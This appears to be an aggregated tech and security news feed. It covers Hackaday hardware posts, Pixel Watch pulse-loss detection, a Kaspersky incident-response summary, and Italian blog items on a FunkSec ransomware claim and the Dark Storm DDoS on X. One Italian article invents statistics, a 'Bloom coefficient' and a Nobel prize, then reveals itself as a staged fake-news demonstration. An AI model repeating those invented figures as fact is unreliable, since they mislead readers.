This week, Jonathan Bennett chats with Doc Searls about SCaLE and Personal AI! What’s the vision of an AI that consumers run themselves, what form factor might that take, and how do we get there?

• kwaai.ai/
• blog.cryptographyengineering.c…

youtube.com/embed/Lc9qmz_dyxg?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/03/12/floss-…

Imagine you want to monitor a pot on the stove to see if it’s boiling over for just a few minutes, but you don’t want to have a dedicated permanent IP webcam solution in your kitchen. [Sebastian Duell]’s FlyingCam hijacks an IKEA lamp gooseneck to become something you never knew you needed: a wireless camera for short-term random remote observation. It’s a beautiful combination of 3D printing and commercial device re-use, and when paired with his DIY wireless screen, it’s a complete solution.

The guts of this project aren’t critical, or expensive. It’s built around one of those ESP32 single-board webcams, with an added fan, battery pack, antenna, and a power switch. You turn it on, and the AP in the ESP32 fires up, or optionally connects to your network. Point the camera at your target and you’re set, at least if you want to sit by your computer. But [Sebastian] also designed a nice simple remote screen, so you can keep tabs on your spaghetti wherever you roam around the house.

We love the attention to keeping the design simple here, both in form and in function. It’s a one-task device, so it’s important that it be extremely easy to use, and it’s hard to beat just pointing the thing and turning on a switch. And it doesn’t hurt that it’s good looking to boot.

IKEA stuff is cheap and cheerful, but often it’s missing just that one functionality that we want. What good is an air-quality sensor without MQTT logging capability, for instance? Or a standing desk that can’t remember set heights? Get hacking!

hackaday.com/2025/03/12/flying…

More and more of the ‘smart’ gadgets like watches and phones that we carry around with us these days come with features that we’d not care to ever need. Since these are devices that we strap onto our wrists and generally carry in close proximity to our bodies, they can use their sensors to make an estimation of whether said body is possibly in the process of expiring. This can be due to a severe kinetic event like a car crash, or something more subtle like the cessation of the beating of one’s heart.

There is a fairly new Loss of Pulse Detection (LoPD) feature in Google’s Pixel Watch 3 that recently got US FDA approval, allowing it to be made available in the US after previously becoming available in over a dozen European countries following its announcement in August of 2024. This opt-in feature regularly polls whether it can detect the user’s pulse. If not found, it cascades down a few steps before calling emergency services.

The pertinent question here is always whether it is truly detecting a crisis event, as nobody wants to regularly apologize for a false alert to the overworked person staffing the 911 or equivalent emergency line. So how do you reliably determine that your smart watch or phone should dial emergencies forthwith?

Budget Medical Devices

One of the amazing things about technological progress is that sensors and processing capabilities that were rather exotic a few decades ago are now being included in just about any smart device you can strap on your wrist. This includes motion sensors, pulse- and oxygen level meters, making these devices in theory capable of acting like ambulatory cardiac monitors and similar medical devices that monitor health parameters and respond to emergencies.

While for a long time the gold standard for heart function monitoring over a longer period outside a hospital setting involved a portable electrocardiogram (ECG) recorder, recently wrist-worn monitoring devices based around photoplethysmography (PPG) have prove themselves to acceptable substitutes. In a 2018 study by Francesco Sartor et al. in BMC Sports Science, Medicine and Rehabilitation the researchers found that the wrist-worn PPG was not as accurate as the ECG-based chest strap monitor, but came close enough to be practical.

Here the difference is such that applications where precision actually matters the chest strap ECG is still the optimal choice, but wrist-worn PPG devices as integrated into many fitness bands and smart watches are an acceptable substitute, such as when monitoring heart rate for signs of atrial fibrillation. A 2022 study by Christopher Ford et al. in JACC: Clinical Electrophysiology examined two smart watches (Apple Watch 4, KardiaBand) for this purpose, finding that their accuracy here was 91% and 87% respectively.

Together with additional sensors like the commonly integrated motion sensor, these devices seem accurate enough to at least determine whether the person wearing them is suffering a cardiac event that requires immediate intervention.

Health Check

The idea of an automatic emergency call isn’t new, with for example the EU making such a system (called eCall) mandatory in new cars since 2018. The idea is that when a serious collision is detected, emergency services are contacted and provided with location and sensor data. Google added its Car Crash Detection feature to the Pixel 3 smartphone in 2019, and Apple added Crash Detection to its Apple Watch and iPhones in 2022. These use sensor data from gyroscopes, GPS, microphones, and accelerometers to determine whether a crash just occurred.

What users of these devices discovered, however, was that activities such as going on a rollercoaster ride could activate this feature, as well as snowmobile rides, skiing, and similar activities. In response, Apple had to adjust its algorithms on these devices to reduce the number of false positives. Despite this, rescue workers in e.g. Canada are still reporting a large number of false positives. One reason cited is that although there’s a time-out before emergency line is called with audible alarm, this can be hard to hear when you’re on a snowmobile.

As it turns out, defining what seems like a pretty clear event to us when you’re limited to just this handful of sensors is much trickier than it seems. After all, what is different between the sensor data from a rollercoaster ride, a car crash, dropping one’s phone or smart watch onto a concrete floor or forgetting said phone on the roof of the car?

In this context, the idea of taking a simple activity like measuring heart rate and pulse, and extrapolating from these that if they cease, an emergency has occurred is fraught with pitfalls as well.

Merging Data

How do you know as a human being that someone has just suffered cardiac arrest? You confirm that they don’t have a noticeable (carotid) pulse, and the reason why you checked is because they clearly collapsed. This is when you’d pull out your phone and dial emergency services. The LoPD feature that Google has introduced has to do effectively exactly these steps, except that it starts from the loss of pulse (LoP) rather than from seeing someone pass out and collapse to the ground.

Thus the tricky part is establishing whether said collapsing has occurred, not whether the pulse has been lost. After all, the user may have simply taken the watch off. According to Google, to verify their algorithms they hired stunt actors to simulate LoP using a tourniquet (cutting off blood flow) and simulating falls like a person suffering cardiac arrest would suffer.

On the sensor side they use the heart rate monitor (PPG sensor), which initially uses the green light to check for pulse, but can switch to infrared and red lights when a LoP condition is triggered. Simultaneously the motion sensor data is consulted, with a lack of motion taken as a sign that we’re dealing with a LoPD. This starts an auditory alarm and visual countdown on the screen before emergency services are contacted with an automated message plus the user’s location.

To calibrate the response to this merged sensor data with clinical data on e.g. cardiological events before trialing the result with said stunt actors and volunteers. An article on this research was also published in Nature (paywalled, gift article), detailing the algorithm and the way they tested its effectiveness. In the paper the authors note one false positive event and subsequent emergency call across 21.67 user-years across two studies, with a sensitivity of 67.23%.

A Matter Of Time

Chain of survival in case of cardiac arrest. (Credit: European Resuscitation Council)
In the case of cardiac arrest, time is of the absolute essence. This is also clearly noted in the Google paper on the LoPD feature, who note that ideally there is a witness on-site who can immediately begin CPR or (ideally) get a nearby automated external defibrillator (AED). Unfortunately in most cases of cardiac arrest, this event goes initially unnoticed. The LoPD feature on a smart watch thus would be for cases where nobody is around to notice the emergency and respond to it. Although it isn’t explicitly mentioned, it seems that the watch can also detect whether it’s being worn or not, which should prevent false positives there.

With each year over half a million US citizens alone suffering cardiac arrest and over half of these occurring outside of a hospital setting, this could potentially save thousands of lives each year. Following cardiac arrest and in the absence of resuscitation the lack of blood (and oxygen) being circulated means that within minutes organs begin to suffer the harmful effects, depending on their oxygen requirements. The brain is generally the first to suffer ill effects, which is why the application of CPR is so crucial.

Because of the intense urgency following a major cardiac event like this, the practical use of this LoPD feature will be highly dependent on the location where the emergency occurs. In the case of e.g. someone collapsing while alone at home in their city house or apartment, this could conceivably save their life if emergency services can arrive within minutes. Even faster and more useful in less urban settings would probably be having your smart device notify nearby people who can then perform CPR while calling 911 or equivalent.

That said, perhaps the real killer feature that’s missing here is an integrated AED in smartphones since everyone has one of those things on them at all times, or even smart watches that can automatically perform defibrillation while also notifying emergency services.

hackaday.com/2025/03/12/pixel-…

Nella giornata di oggi, la banda di criminali informatici di FUNKSEC rivendica all’interno del proprio Data Leak Site (DLS) un attacco informatico all’università italiana di Modena e di Reggio Emilia. Nel post pubblicato nel loro blog presente nel clear web (e nelle underground) i criminali informatici riportato che la gang è in possesso di 1GB di dati, esfiltrati dalle infrastrutture IT dell’azienda. Minacciano la pubblicazione tra 7 giorni ed 11 ore.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

I criminali informatici, per poter attestare che l’accesso alle infrastrutture informatiche è avvenuto con successo, riportano una serie di documenti (samples) afferenti all’azienda.

Questo modo di agire – come sanno i lettori di RHC – generalmente avviene quando ancora non è stato definito un accordo per il pagamento sul riscatto richiesto da parte dei criminali informatici. In questo modo, i criminali minacciando la pubblicazione dei dati in loro possesso, aumentano la pressione verso l’organizzazione violata, sperando che il pagamento avvenga più velocemente.

Da tenere in considerazione che questa cybergang, a differenza delle altre, ha un sito web esposto sulla rete internet, pertanto risulta accessibile nel clear web a chiunque, ed indicizzabili dai motori di ricerca.

Visto che (come scopriremo più avanti) FUNKSEC spesso ha riciclato informazioni di precedenti data leak o attività di hacktivismo, rimane da capire quanto questa rivendicazione sia fondata e pertanto deve essere considerata come “informazione di intelligence”.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

La cybergang Funk Sec

Il gruppo ransomware FunkSec è emerso pubblicamente per la prima volta alla fine del 2024 (come riportano i ricercatori di CheckPoint) e ha rapidamente guadagnato notorietà pubblicando oltre 85 vittime dichiarate, più di qualsiasi altro gruppo ransomware nel solo mese di dicembre. Presentandosi come una nuova operazione Ransomware-as-a-Service (RaaS), FunkSec sembra non avere connessioni note con gang ransomware precedentemente identificate e sono attualmente disponibili poche informazioni sulle sue origini o operazioni.

L’attività del gruppo indica che i numeri impressionanti di vittime pubblicate potrebbero mascherare una realtà più modesta sia in termini di vittime effettive che di livello di competenza del gruppo. La maggior parte delle operazioni principali di FunkSec sono probabilmente condotte da attori inesperti. Inoltre, è difficile verificare l’autenticità delle informazioni trapelate poiché l’obiettivo principale del gruppo sembra essere quello di ottenere visibilità e riconoscimento. Le prove suggeriscono che in alcuni casi le informazioni trapelate sono state riciclate da precedenti fughe di notizie correlate ad attività di attivismo, sollevando dubbi sulla loro autenticità.

FunkSec a legami con il mondo dell’hacktivismo e utilizzano strumenti pubblici , tra cui un ransomware personalizzato probabilmente sviluppato da un autore di malware relativamente inesperto con sede in Algeria. I risultati indicano che lo sviluppo degli strumenti del gruppo, incluso il ransomware, è stato probabilmente assistito dall’intelligenza artificiale, il che potrebbe aver contribuito alla loro rapida iterazione nonostante l’apparente mancanza di competenza tecnica dell’autore

Questo caso evidenzia la linea sempre più sfocata tra hacktivismo e criminalità informatica, sottolineando le sfide nel distinguere l’uno dall’altro. Se tale distinzione esista realmente, o se gli operatori ne siano consapevoli o siano interessati a definirla, resta incerto. Ancora più importante, mette anche in discussione l’affidabilità degli attuali metodi per valutare il rischio rappresentato dai gruppi ransomware, soprattutto quando tali valutazioni si basano sulle affermazioni pubbliche degli stessi attori.

L’Università di Modena e di Reggio Emilia

Fin dalle sue origini risalenti al lontano 1175, l’Ateneo ha rappresentato il fulcro della vita scientifica, culturale e sociale e, seppur con fortune alterne legate ai locali mutamenti politici susseguitisi nel corso dei secoli, l’Ateneo si è progressivamente ampliato per diventare una Università multidisciplinare, attiva e dinamica.

Con circa 30.000 studentesse e studenti iscritti ai corsi di studio di I, II e III livello e oltre 1.400 dipendenti tra personale docente, ricercatore e tecnico-amministrativo, Unimore rientra tra gli Atenei di grandi dimensioni, è organizzata a rete di sedi (Modena e Reggio Emilia) ed è costituita da 13 Dipartimenti e 2 Facoltà/Scuole a cui si affiancano le città di Mantova e Carpi (sedi accreditate di Corsi di laurea), oltre che da centri interdipartimentali dislocati sul territorio delle due province di Modena e di Reggio Emilia, dove si svolgono attività di didattica, ricerca, terza missione e relativi servizi a supporto e di trasferimento tecnologico.

Cos’è il ransomware as a service (RaaS)

Il ransomware, è una tipologia di malware che viene inoculato all’interno di una organizzazione, per poter cifrare i dati e rendere indisponibili i sistemi. Una volta cifrati i dati, i criminali chiedono alla vittima il pagamento di un riscatto, da pagare in criptovalute, per poterli decifrare.

Qualora la vittima non voglia pagare il riscatto, i criminali procederanno con la doppia estorsione, ovvero la minaccia della pubblicazione di dati sensibili precedentemente esfiltrati dalle infrastrutture IT della vittima.

Per comprendere meglio il funzionamento delle organizzazioni criminali all’interno del business del ransomware as a service (RaaS), vi rimandiamo a questi articoli:

• Il ransomware cos’è. Scopriamo il funzionamento della RaaS
• Perché l’Italia è al terzo posto negli attacchi ransomware
• Difficoltà di attribuzione di un attacco informatico e false flag
• Alla scoperta del gruppo Ransomware Lockbit 2.0
• Intervista al rappresentante di LockBit 2.0
• Il 2021 è stato un anno difficile sul piano degli incidenti informatici
• Alla scoperta del gruppo Ransomware Darkside
• Intervista al portavoce di Revil UNKNOW, sul forum XSS
• Intervista al portavoce di BlackMatter

Come proteggersi dal ransomware

Le infezioni da ransomware possono essere devastanti per un’organizzazione e il ripristino dei dati può essere un processo difficile e laborioso che richiede operatori altamente specializzati per un recupero affidabile, e anche se in assenza di un backup dei dati, sono molte le volte che il ripristino non ha avuto successo.

Infatti, si consiglia agli utenti e agli amministratori di adottare delle misure di sicurezza preventive per proteggere le proprie reti dalle infezioni da ransomware e sono in ordine di complessità:

• Formare il personale attraverso corsi di Awareness;
• Utilizzare un piano di backup e ripristino dei dati per tutte le informazioni critiche. Eseguire e testare backup regolari per limitare l’impatto della perdita di dati o del sistema e per accelerare il processo di ripristino. Da tenere presente che anche i backup connessi alla rete possono essere influenzati dal ransomware. I backup critici devono essere isolati dalla rete per una protezione ottimale;
• Mantenere il sistema operativo e tutto il software sempre aggiornato con le patch più recenti. Le applicazioni ei sistemi operativi vulnerabili sono l’obiettivo della maggior parte degli attacchi. Garantire che questi siano corretti con gli ultimi aggiornamenti riduce notevolmente il numero di punti di ingresso sfruttabili a disposizione di un utente malintenzionato;
• Mantenere aggiornato il software antivirus ed eseguire la scansione di tutto il software scaricato da Internet prima dell’esecuzione;
• Limitare la capacità degli utenti (autorizzazioni) di installare ed eseguire applicazioni software indesiderate e applicare il principio del “privilegio minimo” a tutti i sistemi e servizi. La limitazione di questi privilegi può impedire l’esecuzione del malware o limitarne la capacità di diffondersi attraverso la rete;
• Evitare di abilitare le macro dagli allegati di posta elettronica. Se un utente apre l’allegato e abilita le macro, il codice incorporato eseguirà il malware sul computer;
• Non seguire i collegamenti Web non richiesti nelle e-mail;
• Esporre le connessione Remote Desktop Protocol (RDP) mai direttamente su internet. Qualora si ha necessità di un accesso da internet, il tutto deve essere mediato da una VPN;
• Implementare sistemi di Intrusion Prevention System (IPS) e Web Application Firewall (WAF) come protezione perimetrale a ridosso dei servizi esposti su internet.
• Implementare una piattaforma di sicurezza XDR, nativamente automatizzata, possibilmente supportata da un servizio MDR 24 ore su 24, 7 giorni su 7, consentendo di raggiungere una protezione e una visibilità completa ed efficace su endpoint, utenti, reti e applicazioni, indipendentemente dalle risorse, dalle dimensioni del team o dalle competenze, fornendo altresì rilevamento, correlazione, analisi e risposta automatizzate.

Sia gli individui che le organizzazioni sono scoraggiati dal pagare il riscatto, in quanto anche dopo il pagamento le cyber gang possono non rilasciare la chiave di decrittazione oppure le operazioni di ripristino possono subire degli errori e delle inconsistenze.

La sicurezza informatica è una cosa seria e oggi può minare profondamente il business di una azienda.

Oggi occorre cambiare immediatamente mentalità e pensare alla cybersecurity come una parte integrante del business e non pensarci solo dopo che è avvenuto un incidente di sicurezza informatica.

L'articolo FUNKSEC rivendica un attacco Informatico All’Università di Modena e Reggio Emilia. Scopri i dettagli proviene da il blog della sicurezza informatica.

LEDs are getting smaller and smaller, and the newest generations of indexable RGB LEDs are even fiddlier to use than their already diminutive predecessors. [Alex Lorman] has written some notes about the minuscule SK6805-EC10 series of LEDs, which may be helpful to those wanting to learn how to deal with these in a more controlled manner.

Most hardware types will be very familiar with the 5050-sized devices, sold as Neopixels in some circles, which are so-named due to being physically 5.0 mm x 5.0 mm in the horizontal dimensions. Many LEDs are specified by this simple width by depth manner. As for addressable RGB LEDs (although not all addressable LEDs are RGB, there are many weird and wonderful combinations out there!) the next most common standard size down the scale is the 2020, also known as the ‘Dotstar.’ These are small enough to present a real soldering challenge, and getting a good placement result needs some real skills.

[Alex] wanted to use the even smaller EC10 or 1111 devices, which measure a staggering 1.1 mm x 1.1 mm! Adafruit’s product page mentions that these are not intended for hand soldering, but we bet you want to try! Anyway, [Alex] has created a KiCAD footprint and a handy test PCB for characterizing and getting used to handling these little suckers, which may help someone on their way. They note that hot air reflow soldering needs low temperature paste (this scribe recommends using MG Chemicals branded T3 Sn₄₂Bi₅₇Ag₁ paste in this application) and a very low heat to avoid cracking the cases open. Also, a low air flow rate to prevent blowing them all over the desk would also be smart. Perhaps these are more suited to hot plate or a proper convection oven?

As a bonus, [Alex] has previously worked with the slightly larger SK6805-1515 device, with some good extra notes around an interesting nonlinearity effect and the required gamma correction to get good colour perception. We’ll leave that to you readers to dig into. Happy soldering!

We’ve not yet seen many projects using these 1111 LEDs, but here’s one we dug up using the larger 1515 unit.

hackaday.com/2025/03/12/some-u…

While the Bus Pirate 5 is an impressive piece of hardware, the software is arguably where the project really shines. Creator [Ian Lesnet] and several members of the community are constantly working to add new features and capabilities to the hardware hacking multi-tool, to the point that if your firmware is more than a few days old there’s an excellent chance there’s a fresher build available for you to try out.

One of the biggest additions from the last week or so of development has been the I2C sniffer — a valuable tool for troubleshooting or reverse engineering devices using the popular communications protocol. [Ian] has posted a brief demo video of it in action.

It’s actually a capability that was available in the “classic” versions of the Bus Pirate, but rather than porting the feature over from the old firmware, [Ian] decided to fold the MIT licensed pico_i2c_sniffer from [Juan Schiavoni] into the new codebase. Thanks to the RP2040’s PIO, the sniffer works at up to 500 kHz, significantly outperforming its predecessor.

Admittedly, I2C sniffing isn’t anything you couldn’t do with a cheap logic analyzer. But that means dealing with captures and making sure the protocol decoder is setup properly, among other bits of software tedium. In comparison, once you start the sniffer program on the Bus Pirate 5, I2C data will be dumped out to the terminal in real-time for as long as you care to see it. For reverse engineering, it’s also very easy to move quickly from sniffing I2C packets to replaying or modifying them within the Bus Pirate’s interface.

If you already have a Bus Pirate 5, all you need to do is flash the latest firmware from the automated build system, and get sniffing. On the fence about picking one up? Perhaps our hands-on review will help change your mind.

hackaday.com/2025/03/12/i2c-sn…

Kaspersky provides rapid and fully informed incident response services to organizations, ensuring impact analysis and effective remediation. Our annual report shares anonymized data about the investigations carried out by the Kaspersky Global Emergency Response Team (GERT), as well as statistics and trends in targeted attacks, ransomware and adversaries’ tools that our experts observed throughout the year in real-life incidents that required both comprehensive IR unit support and consulting services aimed at assisting organizations’ in-house expert teams.

Download the full version of the report.

Regions and industries of incident response requests

In 2024, we saw the share of incident response requests rise in most of the regions, with the majority of investigations conducted in the CIS (50.6%), the Middle East (15.7%) and Europe (10.8%).

Geographic distribution of incident response requests, 2024

The distribution of IR requests by industry followed the 2023 pattern, keeping industrial (23.5%), government (16.3%) and financial (13.3%) organizations in the top three most targeted industries. However, this year, the majority of requests came from industrial enterprises, whereas the government agencies were targeted less often than in 2023. We also observe a growing tendency in incidents related to the transportation industry — the number of requests for IR services has doubled since 2023.

Distribution of organizations that requested IR assistance, by industry, 2024

Key 2024 trends and statistics

In 2024, ransomware attacks saw an increase of 8.3 p.p. from the 2023 numbers and amounted to 41.6% of incidents overall. Our GERT experts estimate that ransomware will persist as the main threat to organizations worldwide in the upcoming year, continuing the trend of the recent years, as we observe this threat holding top positions among incidents in organizations. In the majority of infections, we encountered samples of the LockBit family (43.6%), followed by Babuk (9.1%) and Phobos (5.5%). Our investigations also revealed new ransomware families, such as ShrinkLocker and Ymir. What is more, GERT experts discovered noteworthy malicious campaigns like Tusk and a set of incidents with CVE-2023-48788 exploited.

Another alarming trend identified in real incident response cases is wider use of such tools as Mimikatz (21.8%) and PsExec (20.0%). They are commonly used during post-exploitation for password extraction and lateral movement. We also observe a strengthening tendency for data leakage to be the second most common reason for an incident response request, amounting to 16.9% of all incidents, which correlates with our assumptions regarding trends in credential access techniques.

Recommendations for preventing incidents

To protect your organization against cyberthreats and minimize the damage in the case of an attack, Kaspersky GERT experts recommend:

• Implementing a strong password policy and using multi-factor authentication
• Removing management ports from public access
• Adopting secure development practices to prevent insecure code from reaching production environments
• Establishing a zero-tolerance policy for patch management, or having compensation measures in place for public-facing applications
• Ensuring that employees maintain a high level of security awareness
• Implementing rules to detect utilities commonly used by adversaries
• Conducting frequent, regular compromise assessment activities
• Employing a security tool set that includes EDR-like telemetry
• Constantly testing the security operations team’s response times with simulated attacks
• Prohibiting the use of any software being used within the corporate network that is known to be used by attackers
• Regularly backing up your data
• Working with an Incident Response Retainer partner to address incidents with fast SLAs
• Implementing strict security programs for applications that handle personal information
• Implementing security access control over important data using DLP
• Continuously training your incident response team to maintain their expertise and stay up-to-date with the evolving threat landscape

The full 2024 Incident Response Report features additional information about real-life incidents, including new threats discovered by Kaspersky experts. We also take a closer look at APT activities, providing statistics for the most prolific groups. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during incident response engagements.

securelist.com/kaspersky-incid…

Il primo report dell’analisi condotta dal progetto McGuffin che ha coinvolto più di 23 Paesi attraverso una task force di indagine coordinata con università e centri studi specialistici, ha confermato un dato allarmante: con lo sviluppo dei LLM, l’allarme fake news è quanto mai attuale e richiede un intervento normativo per regolamentare l’utilizzo dell’Intelligenza Artificiale, l’accesso e la partecipazione ai social network. Uno dei fattori che suscita maggiore preoccupazione è l’anonimato online, che stando agli studi è strettamente correlato con la produzione e diffusione delle fake news.

Stando ai dati forniti, il coefficiente di Bloom – che è il principale parametro internazionale impiegato per analizzare la capacità di valutare la pericolosità di notizie false all’interno dei sistemi dei principali social network – fornisce infatti degli indicatori piuttosto allarmanti:

• ha un valore medio fra 4 e 8 nei Paesi in cui l’utilizzo di social network e dei LLM è fortemente limitato;
• ha un valore medio fra 15 e 16 nei Paesi in cui è diffuso l’utilizzo di social network ma non quello dei LLM;
• ha un valore medio pari a 32 nei Paesi in cui social network e LLM sono diffusi, con picchi di 42 nelle ipotesi in cui è garantito l’anonimato online e non esiste una legislazione riguardante l’Intelligenza Artificiale.

Da un lato, è necessario regolamentare l’Intelligenza Artificiale con la previsione normativa di dover inserire parametri etici correttivi in cui sono valorizzate le notizie vere e vengono sfavorite le fake news. Questo però è un intervento che non si può dire sufficiente, motivo per cui sono stati richiamati gli studi di Smith, premiati con il Nobel per l’Informazione nel 1984, che hanno dimostrato una correlazione fra aumento del coefficiente di Bloom e diminuzione degli autori che optano per pubblicazioni a proprio nome scegliendo uno pseudonimo o l’anonimato.
Proiezione di Smith sulla correlazione fra aumento del coefficiente di Bloom e diminuzione degli autori identificabili nel tempo.
Questo dovrebbe indurre una riflessione: con le moderne tecnologie e i social network, quanto è ancora più allarmante la proiezione di Smith qualora venisse aggiornata? Ecco perché bisogna che l’anonimato online, soprattutto nei social network, sia ridotto al minimo indispensabile (ad es. solo per forze dell’ordine, moderatori o fact-checker ufficiali della piattaforma). Si deve prevedere comunque l’accesso con un’autenticazione fornita dallo Stato (ad es. tramite SpID).

Altrimenti, non sarà mai possibile garantire un ecosistema social sano e sicuro. Soprattutto per i minori, primi soggetti ad essere messi in pericolo dall’anonimato online.

Ecco dunque che si conferma così l’esigenza di un intervento normativo urgente a riguardo. Non basteranno pene severe non solo per chi diffonde fake news elaborate con l’Intelligenza Artificiali, ma si dovrà sanzionare anche chi si registra con falso nome ad un social network dal momento che questo è il presupposto di ogni attività illecita svolta all’interno della piattaforma.

Conclusioni: fake news e ruolo del lettore

Quali conclusioni trarre?

Che tutto quello che hai letto fino a questo momento è una fake-news!

E a pensarci bene: rileggendo il titolo, ora assume tutto un altro significato o no?

Inoltre il ruolo di chi legge la notizia è fondamentale! E deve continuare ad esserlo, perché soltanto la persona che approccia la notizia è l’ineliminabile fact-checker che applica liberamente il proprio pensiero critico, ricerca fonti, interpreta dati e valuta tanto il merito quanto il metodo. E legge per intero un articolo, arrivando fin qui. Dove rivelo il trucco e il gioco.

Un attento lettore avrebbe potuto facilmente rilevare tutte le incongruenze dell’articolo, nonché la mancanza di fonti riscontrabili. Questa non è stata altro che la dimostrazione pratica di come si può ingegnerizzare una fake news su un argomento particolarmente sentito. Come quello delle fake news, per l’appunto. Con una spolverata di Intelligenza Artificiale che fa tendenza. E l’odio indimostrato verso l’anonimato online, che invece è un presidio di libertà peraltro riconosciuto nel novero dei diritti fondamentali dell’Internet (“Dichiarazione dei diritti in Internet”, art. 10).

Una fake news dev’essere infatti allettante, stuzzicare bias cognitivi vari, assumere una parvenza di autorevolezza e presentare chissà quali realtà oggettive indimostrate, una semantica attentamente selezionata e così via. Tutti ingredienti ben noti che inducono a dispensare facendo leva sull’emotività e contando sulla diminuita capacità di pensiero critico.

Il cocktail è così un mescolato di indignazione, senso di pericolo e tutto ciò in cui vogliamo credere per operare soluzioni facili e che guarda caso viene comodamente offerto. Certo, senza rappresentarne il costo, che spesso è la compressione di diritti e libertà fondamentali. Per quanto inebriante sul momento, dà facili illusioni e un pessimo risveglio. Che fa sempre e comunque esperienza, meglio ancora se secondo un approccio di tipo lesson learned.

Confidando che le citazioni nerd abbiano reso più piacevole l’inganno (anzi: buona caccia di easter egg!), mi congedo con le parole del Bardo:

Se l’ombre nostre offeso v’hanno
Pensate, per rimediare al danno,
che qui vi abbia colto il sonno
durante la visione del racconto
e questa vana e sciocca trama
non sia nulla più di un sogno
Signori, non ci rimproverate,
Rimedieremo, se ci perdonate.

E, come è vero che son sincero,
Se solo avremo la fortuna di sfuggire ai vostri insulti,
a fare ammenda riusciremo.
O chiamatemi bugiardo se vi va!
Quindi buonanotte a tutti voi
Regalatemi un applauso, amici miei
E Puck a tutti i danni rimedierà

L'articolo Fake news: studio internazionale rivela che è tutta colpa dell’AI e dell’anonimato online proviene da il blog della sicurezza informatica.

L’attacco informatico a X, il social network di Elon Musk, ha scatenato una vera e propria caccia ai responsabili. Dopo le dichiarazioni dello stesso Musk, che ha attribuito l’attacco a fonti ucraine, l’evento ha assunto una dimensione geopolitica rilevante, soprattutto considerando la recente riunione tra il presidente Volodymyr Zelensky e Donald Trump.
profilo su X di Dark Storm team

L’attacco e le sue conseguenze

L’attacco DDoS, attribuito al gruppo noto come “Dark Storm”, ha causato disservizi significativi sulla piattaforma X, con interruzioni intermittenti per diverse ore. Secondo alcuni esperti di cybersecurity, la tempistica dell’attacco potrebbe non essere casuale, avvenendo poco dopo l’incontro tra Zelensky e Trump, evento che potrebbe aver influenzato la strategia di attori legati all’ambito cyber.

La caccia ai responsabili

Dopo l’attacco, le community OSINT (Open Source Intelligence) e vari ricercatori indipendenti hanno iniziato a investigare sull’identità degli attori dietro Dark Storm. Un utente con il nome “lulagain“, attivo su forum del dark web, ha pubblicato un presunto leak con informazioni su uno dei membri del gruppo, includendo immagini e collegamenti a profili di X.

Uno dei post più rilevanti è apparso sulla piattaforma X dallo stesso ricercatore Baptiste Robert (@fs0c131y), il quale ha affermato di aver identificato i responsabili dell’attacco e di essere disponibile a discutere della questione direttamente con Elon Musk a Washington.

L’analisi OSINT condotta avrebbe portato all’individuazione di un possibile membro del gruppo, di cui sono state diffuse immagini nei forum underground e sui social media.
Post su breachForums che porta alla luce il tweet di @fs0c131y

Le implicazioni politiche e di sicurezza

L’attacco ha sollevato interrogativi sulla sicurezza della piattaforma X e sulla sua vulnerabilità a minacce informatiche. Inoltre, l’ipotesi di un coinvolgimento ucraino suggerito da Musk ha generato dibattiti sulle reali motivazioni dietro l’azione di Dark Storm. Si tratta di un gruppo indipendente o di un’operazione orchestrata in un contesto più ampio di cyber warfare?

Le indagini proseguono, e se le analisi OSINT si rivelassero corrette, potremmo presto assistere a ulteriori sviluppi sulla reale identità degli hacker dietro Dark Storm e sulle loro connessioni con attori statali o privati. Nel frattempo, la sicurezza di X rimane sotto osservazione, e il caso continua a far discutere l’opinione pubblica e gli esperti del settore.
Tweet di @fs0c131y che mostra la persona dietro all’attacco di X individuato dopo analisi OSINT

Conclusioni

L’attacco DDoS condotto da Dark Storm contro X rappresenta un chiaro esempio di come gli hacktivisti utilizzino strumenti pubblicamente accessibili, come Check-host.net, per dimostrare l’efficacia delle loro operazioni. La pubblicazione di prove su Telegram e Breach Forums evidenzia un modus operandi consolidato: colpire bersagli di alto profilo e rivendicare pubblicamente le azioni per ottenere visibilità e consenso all’interno delle loro comunità di riferimento.

La risposta di X, con l’attivazione della protezione Cloudflare per mitigare l’impatto degli attacchi, dimostra come le piattaforme digitali stiano adottando misure sempre più sofisticate per difendersi dalle minacce informatiche. L’introduzione di un sistema di captcha per filtrare traffico sospetto è una contromisura immediata ed efficace, ma solleva interrogativi sulla scalabilità e sulla fruibilità della piattaforma per gli utenti legittimi.

Questo episodio sottolinea ancora una volta la crescente importanza della cybersecurity nel panorama digitale odierno. Gli attacchi DDoS, sempre più utilizzati come strumento di protesta politica e di destabilizzazione, richiedono una continua evoluzione delle strategie difensive da parte delle aziende tecnologiche. Il caso Dark Storm vs X è solo l’ennesima dimostrazione di come la guerra informatica tra hacktivisti e grandi piattaforme sia destinata a proseguire, con nuove tattiche e contromisure in costante sviluppo.

L'articolo Attacco a X: Scovato il Responsabile? Le Indagini Puntano in una Direzione Inattesa! proviene da il blog della sicurezza informatica.

Google ha dichiarato di aver pagato 11,8 milioni di dollari di ricompensa a 660 ricercatori di sicurezza nel 2024 per le vulnerabilità da loro scoperte.

Secondo l’azienda, dal lancio del primo Vulnerability Reward Program (VRP) nel 2010, Google ha pagato oltre 65 milioni di dollari in premi per bug ai ricercatori.

L’anno scorso, Google ha modificato il suo sistema di ricompense, offrendo ai ricercatori fino a 151.515 dollari nell’ambito di Google VRP e Cloud VRP, fino a 300.000 dollari nell’ambito di Mobile VRP e fino a 250.000 dollari per vulnerabilità critiche nel browser Chrome.

